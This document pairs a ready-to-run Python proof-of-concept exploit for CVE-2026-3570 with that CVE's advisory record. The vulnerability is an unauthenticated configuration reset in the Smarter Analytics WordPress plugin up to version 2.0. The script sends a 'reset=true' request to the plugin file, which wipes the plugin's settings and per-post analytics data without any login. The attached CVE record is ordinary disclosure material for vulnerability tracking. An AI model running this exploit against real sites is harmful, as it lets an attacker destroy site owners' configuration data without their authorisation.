CVE-2026-3570

# PoC for CVE-2026-3570 # Exploit Title: Smarter Analytics <= 2.0 - Unauthenticated Configuration Reset import requests def exploit(target_url): # The vulnerable endpoint is the main plugin file url = f"{target_url}/wp-content/plugins/smarter-analytics/smarter-analytics.php" # The 'reset' parameter triggers the vulnerability without authentication params = { "reset": "true" } try: print(f"[*] Sending request to {url}...") response = requests.get(url, params=params, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] If the target is vulnerable, the configuration has been reset.") else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with actual target exploit(target)

{"cve": {"id": "CVE-2026-3570", "sourceIdentifier": "[email protected]", "published": "2026-03-21T04:17:30.070", "lastModified": "2026-04-24T16:27:44.277", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Smarter Analytics plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 2.0. This is due to missing authentication and capability checks on the configuration reset functionality in the global scope of smarter-analytics.php. This makes it possible for unauthenticated attackers to reset all plugin configuration and delete all per-page/per-post analytics settings via the 'reset' parameter."}, {"lang": "es", "value": "El plugin Smarter Analytics para WordPress es vulnerable a acceso no autorizado en todas las versiones hasta la 2.0, inclusive. Esto se debe a la falta de autenticación y comprobaciones de capacidad en la funcionalidad de restablecimiento de configuración en el ámbito global de smarter-analytics.php. Esto hace posible que atacantes no autenticados restablezcan toda la configuración del plugin y eliminen todas las configuraciones de análisis por página/por publicación a través del parámetro 'reset'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/smarter-analytics/tags/2.0/smarter-analytics.php#L27", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/smarter-analytics/trunk/smarter-analytics.php#L27", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/06f0d53d-734c-4cc1-902d-bdf4826036bf?source=cve", "source": "[email protected]"}]}}